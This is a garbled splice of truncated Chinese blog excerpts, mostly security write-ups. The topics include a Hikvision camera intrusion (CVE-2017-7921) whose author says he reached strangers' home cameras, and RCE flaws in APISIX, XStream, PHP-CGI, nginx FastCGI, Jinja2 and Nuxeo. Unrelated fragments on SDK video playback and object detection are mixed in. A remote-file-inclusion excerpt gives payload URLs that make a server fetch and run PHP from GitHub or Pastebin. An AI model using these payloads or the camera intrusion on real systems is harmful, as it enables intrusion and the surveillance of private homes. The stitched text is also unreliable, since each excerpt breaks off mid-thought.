海康威视摄像头入侵+fofa(CVE-2017-7921) By:Jesse 重保期间实在是太无聊,于是就找了个海康威视的摄像头日日玩,结果一玩就是一天呢哈哈哈. 1.漏洞编号 CVE-2017-7921 2.漏洞概述 通过构造url进行检索所有用户.屏幕截图.配置文件下载,通过解码工具破解后台的账户密码,从而实时监控,想想还是非常危险的,万一入侵到别人家里的摄像头,你的生活全在别人的屏幕前.在把玩的过程中的确找到了别人家里的摄像头. 3.影响版本 HikvisionDS-2CD2xx2F-IS

from:http://www.freebuf.com/sectool/121339.html 什么是 Shodan? 首先,Shodan 是一个搜索引擎,但它与 Google 这种搜索网址的搜索引擎不同,Shodan 是用来搜索网络空间中在线设备的,你可以通过 Shodan 搜索指定的设备,或者搜索特定类型的设备,其中 Shodan 上最受欢迎的搜索内容是:webcam,linksys,cisco,netgear,SCADA等等. 那么 Shodan 是怎么工作的呢?Shodan 通过扫描全网

00x1漏洞环境 Apache APISIX Dashboard 2.7 - 2.10 版本受到影响 通过git拉取在docker搭建环境 git clone https://github.com/apache/apisix-docker 注意这里需要把yml文件改成2.7版本 然后用docker搭建就可以了 00x2 攻击过程 环境跑起来后成功访问到9000登录界面 这里的未授权访问指的是对下面两个接口没有鉴权处理 /apisix/admin/migrate/export /apisix/ad

声明 本次实践是在合法授权情况下进行,数据已经全部脱敏,主要是提供思路交流学习,请勿用于任何非法活动,否则后果自负. 实战记录 信息收集 1,踩点站点 通过fofa 查到目标DouPHP框架该站点(也测试了信息收集安全),由于是一个开源框架,因此选择下载源码,先通过白盒走查,发现隐藏的安全问题. 2 本地代码走查并复现bug 完成本地搭建cms,在安装的页面中发现录入的内容会在一个配置文件中进行保存,因为后续要执行大概率是php文件,通过配置文件匹配,发现了config.php配置文件. 打开配

原谅我只提供一个链接,我在这里写了两遍,最后加个链接页面卡死了,下面的demo,最好真机调试.(写博客还是在别的地方写复制到这里比较好!) 一个画面可以做,4个,9个,16个画面原理是一样的,集合到自己app时配置文件不好配,多多百度!(注意:发现xcode8.0大华的视频监控运行不了,需要更换一个libpostprocess.a文件--链接http://pan.baidu.com/share/link?shareid=135046858&uk=3039777472) 大华和海康威视https:

catalogue . Java xStream . DynamicProxyConverter . java.beans.EventHandler . RCE via XStream object deserialization . Standard way to serialize and deserialize Objects with XStream . SECURITY- / CVE-- . What to do about it 0. 利用方式跟踪 目前为止,已知有两个触发方式 xs

catalog . Introduction . nginx文件类型错误解析漏洞 . 针对直接公网开放的Fast-CGI攻击 . 通过FCGI API动态修改php.ini中的配置实现RCE 1. Introduction 我们首先来梳理一下CGI的相关概念 . CGI CGI是为了保证web server传递过来的数据是标准格式的,从本质上来说,它是一个协议标准.web server(例如nginx)只是内容的分发者.比如 ) 如果请求/index.html,那么web server会去文件系

具体漏洞是:CVE-2012-1823(PHP-CGI RCE) 在地址后面加进参数运行对应的php-cgi 参数的行为 例如 index.php?-s 相参于/usr/bin/php53-cgi/php-cgi -f index.php -s php-cgi --help如下: Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f <file>] php-cgi <file> [args...] -a Run interactively -b &

技术揭秘:海康威视PASCAL VOC2012目标检测权威评测夺冠之道 原创 2016-09-21 钟巧勇 深度学习大讲堂 点击上方“深度学习大讲堂”可订阅哦!深度学习大讲堂是高质量原创内容平台,邀请学术界.工业界一线专家撰稿,致力于推送人工智能与深度学习最新技术.产品和活动信息!           近年来,随着深度学习的崛起,计算机视觉得到飞速发展.目标检测作为计算机视觉的基础算法,也搭上了深度学习的快车.基于Proposal的检测框架,从R-CNN到Faster R-CNN,算法性能越来越

最近有个视频播放系统,需要对海康的mp4格式视频进行播放,由于普通播放器无法对该视频进行播放原因是海康对视频进行了自己的编码,需要相应的解码才可以对视频进行播放. 下面是对海康威视视频播放的c#代码(需要从海康官网下载播放库). 一,这个是核心库通过c#对海康提供的动态链接库dll方法的封装. public class PlayCtrlSDK { #region 解码库 [SecurityCritical] [DllImport("PlayCtrl.dll")] public stat

1.SRC寄存器读写测试 2.采集数据终端模块(这里是康海时代)调试 3.RS485传感器设备调试 4.LED/TTS/海康威视等展示设备调试 5.Modbus等协议规约资料及4-20mA设备调试 以上是本工具的主要几块功能,适用于工业标准协议Modbus-RTU,可用于工业.农业及电力行业内的各种采集.控制以及展示设备的调试和理解,提高工程实施和软件开发效率,另外本工具一直在维护,以后会增加一些其他设备的调试功能.供大家参考使用,需要的可以直接联系我!

FOFA是一款网络空间搜索引擎,它通过进行网络空间测绘,帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析.应用分布统计.应用流行度等. 何为API?如果你在百度百科上搜索,你会得到如下结果: API(Application Programming Interface,应用程序编程接口)是一些预先定义的函数,目的是提供应用程序与开发人员基于某软件或硬件得以访问一组例程的能力,而又无需访问源码,或理解内部工作机制的细节. 那么通俗一点来说,API是什么呢?从技术角度来说,API指的

目录 0x00 前言 0x01 调试分析 0x02 补丁分析 0x03 参考 影响版本: 2.0.0-2.0.9 1.0.0-1.0.5 0x00 前言 这个漏洞与之前那个SpringBoot的SpEL表达式注入漏洞点基本一样,而且漏洞爆出来的时间点也差不多,可是没有找到那个漏洞的CVE编号,不知道是什么原因. 这个漏洞的触发点也是对用户传的参数的递归解析,从而导致SpEL注入,可是两者的补丁方式大不相同.Springboot的修复方法是创建一个NonRecursive类,使解析函数不进行递归.

http://www.zixem.altervista.org/RCE/level1.php 构造payload: https://zixem.altervista.org/RCE/level1.php?page=https://raw.githubusercontent.com/pipter/SRE/master/test.php https://zixem.altervista.org/RCE/level1.php?page=http://pastebin.com/raw.php?i=DDS

首先,感谢ringk3y的分析:http://ringk3y.com/2018/08/31/ec ... %E6%89%A7%E8%A1%8C/ 大家跟一遍代码基本上都能弄明白漏洞的原理,整个漏洞的构造还是很有意思的 然后网上公开的基本上都是2.x版本的payload,对于sql injection,除了文中提到的insert_ads,insert_bought_notes函数同样存在漏洞:     $sql = 'SELECT u.user_name, og.goods_number, oi.

一.注意事项 1.在开发海康威视的SimpleDemo时,最好使用真机,因为海康提供的5个库不支持模拟的i386架构. 2.在XCode9.3版本上运行SimpleDemo时,对.mm文件进行编辑时,XCode直接回闪退,经测试在XCode9.1可以正常运行 3.配置好这些参数          4.拿海康提供的demo,自己新建项目,并根据海康的配置自己集成即可,多尝试尝试. 相关资料: https://www.jianshu.com/p/24adda28e9f0 https://www.ji

海康威视IPCamera图像捕获 捕获海康威视IPCamera图像.转成OpenCV能够处理的IplImage图像(一) 捕获海康威视IPCamera图像.转成OpenCV能够处理的IplImage图像(二) 所使用海康威视摄像头型号:DS-2CD4026FWD-(A)(P) 海康威视IPCamera图像捕获方法有两种: (1)利用SDK里面的NET_DVR_CaptureJPEGPicture_NEW进行视频抓图 (2)捕获实时流.将实时流解码成YV12,然后转换成RGB 在上一篇博文里,我介

我使用了一个特殊的图片上传技巧,绕过PHP GD库对图片的转换处理,最终成功实现了远程代码执行. 事情是这样的.当时我正在测试该网站上是否存在sql注入漏洞,不经意间我在网站个人页面发现了一个用于上传头像的文件上传表单.开始时我并没指望在上传功能处发现漏洞,但我决定试试. 我上传了一个图片文件,通过截断http数据包,修改jpg图片的文件名后缀为php,然后继续上传.我惊讶的居然上传成功了,我几乎不敢相信这么简单的漏洞居然存在.于是我复制了图片url并且在浏览器上打开.进入我眼帘的是图片的二进制

漏洞简述 漏洞简介 Jinja2.10版本,Environment的实例方法from_string,存在RCE,该函数在内部实现逻辑中,存在exec函数去执行了,from_string函数参数中的jinja2的代码指令. 漏洞分类 远程命令/代码执行 影响版本 2.10 漏洞验证: 验证环境 系统: Mac OS X Python:2.7.15 Flask : 1.0.2 Jinja: 2.10 验证服务器脚本(漏洞代码) import jinja2 from flask import Flas

简介 Nuxeo Platform是一款跨平台开源的企业级内容管理系统(CMS).nuxeo-jsf-ui组件处理facelet模板不当,当访问的facelet模板不存在时,相关的文件名会输出到错误页面上,而错误页面会当成模板被解析,文件名包含表达式也会被输出同时被解析执行,从而导致远程代码执行漏洞.在漏洞挖掘过程中发现nuxeo-jsf组件默认在10.2没有安装,历史版本是默认就安装的.可以通过nuxeoctl mp-install nuxeo-jsf-ui 命令安装.本文介绍的两个漏洞由笔者